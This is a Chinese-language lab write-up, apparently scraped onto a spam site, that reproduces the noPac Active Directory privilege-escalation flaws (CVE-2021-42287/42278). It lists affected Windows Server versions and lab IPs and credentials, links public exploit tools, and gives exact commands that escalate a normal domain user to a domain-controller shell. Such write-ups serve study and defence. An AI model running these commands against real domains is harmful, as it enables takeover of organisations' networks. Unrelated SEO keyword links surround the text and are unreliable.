当前位置: 首页 > wzjs >正文

海淘网站潜江市住房城乡建设厅网站

海淘网站,潜江市住房城乡建设厅网站,app官网,站酷网页设计分析WindowsAD 域服务权限提升漏洞(CVE-2021-42287, CVE-2021-42278) 1.漏洞描述 Windows域服务权限提升漏洞(CVE-2021-42287, CVE-2021-42278)是由于Active Directory 域服务没有进行适当的安全限制,导致可绕过安…

WindowsAD 域服务权限提升漏洞(CVE-2021-42287, CVE-2021-42278)

1.漏洞描述
       Windows域服务权限提升漏洞(CVE-2021-42287, CVE-2021-42278)是由于Active Directory 域服务没有进行适当的安全限制,导致可绕过安全限制进行权限提升。攻击者可利用该漏洞造成将域内的普通用户权限提升到域管理员权限等危害。

2.影响版本
CVE-2021-42287:
Windows Server 2012 R2 (Server Core installation)

Windows Server 2012 R2

Windows Server 2012 (Server Core installation)

Windows Server 2012

Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)

Windows Server 2008 R2 for x64-based Systems Service Pack 1

Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)

Windows Server 2008 for x64-based Systems Service Pack 2

Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)

Windows Server 2008 for 32-bit Systems Service Pack 2

Windows Server 2016 (Server Core installation)

Windows Server 2016

Windows Server, version 20H2 (Server Core Installation)

Windows Server, version 2004 (Server Core installation)

Windows Server 2022 (Server Core installation)

Windows Server 2022

Windows Server 2019 (Server Core installation)

Windows Server 2019

CVE-2021-42278:
Windows Server 2012 R2 (Server Core installation)

Windows Server 2012 R2

Windows Server 2012 (Server Core installation)

Windows Server 2012

Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)

Windows Server 2008 R2 for x64-based Systems Service Pack 1

Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)

Windows Server 2008 for x64-based Systems Service Pack 2

Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)

Windows Server 2008 for 32-bit Systems Service Pack 2

Windows Server 2016 (Server Core installation)

Windows Server 2016

Windows Server, version 20H2 (Server Core Installation)

Windows Server, version 2004 (Server Core installation)

Windows Server 2022 (Server Core installation)

Windows Server 2022

Windows Server 2019 (Server Core

3.漏洞利用条件
(1)一个普通域成员帐户

(2)域用户有创建机器用户的权限(一般默认权限)

(3)DC未打补丁KB5008380或KB5008602

4.环境准备
Win7

192.168.42.128

域普通用户:adtest/szg:1234qweR

Win server2008 R2 Standard Service Pack 1

192.168.42.136

域控机器

Kali

192.168.42.138

攻击机器

5.漏洞利用工具
下载地址:

https://github.com/WazeHell/sam-the-admin

https://github.com/Ridter/noPac

6.漏洞复现
sam-the-admin脚本
查看源码,发现脚本实际是实际就是调用两个可执行文件

kali中存在这两个文件的py文件,路径为/usr/local/bin/smbexec.py 和 /usr/local/bin/secretsdump.py

修改代码如下:

安装requirements.txt文件中的python模块

pip3 install -r requirements.txt

执行如下命令进行域服务提权攻击

python3 sam_the_admin.py "adtest/szg:1234qweR" -dc-ip 192.168.42.136 -shell

PS目前脚本只能在kali环境下运行成功。

noPac脚本

先安装requirements.txt文件中的模块

pip3 install -r requirements.txt

Scanner

python3 scanner.py -use-ldap adtest/szg:1234qweR -dc-ip 192.168.42.136

GetST

python3 noPac.py -use-ldap adtest/szg:1234qweR -dc-ip 192.168.42.136

Auto get shell

python3 noPac.py -use-ldap adtest/szg:1234qweR -dc-ip 192.168.42.136 –shell

7.漏洞参考:

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-42287

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-42278

http://www.dtcms.com/wzjs/602030.html

相关文章:

  • 网站添加属性济南seo快速霸屏
  • 郑州树标网站建设上海品牌全案设计
  • 重庆网站建设-首选云慧通wordpress提示窗
  • 网站的具体内容织梦网站地图在线生成
  • 在线转格式网站怎么做网站建设有哪些方法
  • 泰安住房和城乡建设厅网站那里可以做旅游网站的吗
  • 静态网站开发的目的点餐小程序源码下载
  • 南昌市网站建设推广wordpress插件访客
  • 良乡网站建设网站开发文档的示例
  • 杭州做肉松饼的网站有多少家网站建设普及型
  • 如何不备案建网站网站小视频怎么做代理商
  • 建设旅游网站的价值扶贫网站建设
  • 项目建设备案网站wordpress教程dara
  • 需要做网站的公司在哪些建站专业团队一站式服务
  • 网站做弹窗广告视频一键生成网址链接
  • 视频网站怎么做可以播放电视剧wordpress 08影院
  • 网站cms系统下载1.网站建设基本流程是什么
  • 烟台装修公司网站建设公司网站建设记哪个科目
  • 手机网站怎么做域名解析空间设计网站大全
  • 网站建设 证书wordpress播放直播
  • 乐清柳市网站建设公司开发商延期交房怎么处理
  • 江苏省住房保障建设厅网站首页安庆专业做淘宝网站
  • 深圳做网站网站建设仟首先金手指13
  • 设计开发上海网站设计开发公司8小8x人成免费观看
  • 云南交投集团公路建设有限公司网站怎么样自己做网站赚钱年入40万
  • 建设网站价钱个人版的wordpress怎么加关键词
  • 手机网站建设系统网站板块设计有哪些
  • 怎么进入网站后台图片广东品牌网站制作公司
  • 做空压机网站织梦网站栏目增加
  • 建外贸营销型网站大连旧房翻新装修哪家公司好